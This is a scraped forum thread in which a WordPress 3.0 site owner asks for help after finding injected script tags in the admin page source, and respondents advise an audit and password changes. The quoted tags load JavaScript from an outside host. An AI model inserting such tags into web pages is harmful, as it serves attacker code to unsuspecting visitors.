wordpress 3.0 security?

views:

answers:

wordpress 3.0 security?

Hi,

I have a website with wordpress 3.0.

I noticed that /wp-admin displays the following error today.

Warning: Cannot modify header information - headers already sent by (output started at /www/sites/..com/files/html/wp-includes/default-constants.php:299) in /www/sites/..com/files/html/wp-includes/pluggable.php on line 890

I used IE's view source. I found the following code.

script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"&gt;&lt;/script&gt;
<!--661c36e2c5591b25cbc164e7b376623b-->
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"&gt;&lt;/script&gt;
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"&gt;&lt;/script&gt;
<!--661c36e2c5591b25cbc164e7b376623b--><br />

it looks like my website has been hacked.

I enabled cforms plugin only.

any ideas or suggestions?

+1 A:

Pull the server offline, then run a security audit on it and any client that can upload content to it. Then change all your passwords.

David Dorward 2010-08-11 18:20:50

@David Dorward // thank you for your advice. So..it might not be caused by WP or wp plugin?

Moon 2010-08-11 18:23:39

WordPress 3.0.1 is out, it might be a security update (I haven't checked) so it might be the vulnerability. I don't know anything about CFForms. It might be some unrelated vulnerability on the server. It might be malware on a client which has sniffed an ftp password. That's the point of the security audit.

David Dorward 2010-08-11 18:26:58

3.0.1 was not a security release.

John P Bloch 2010-08-11 18:36:22

ansaurus

tags:

views:

answers:

wordpress 3.0 security?

related questions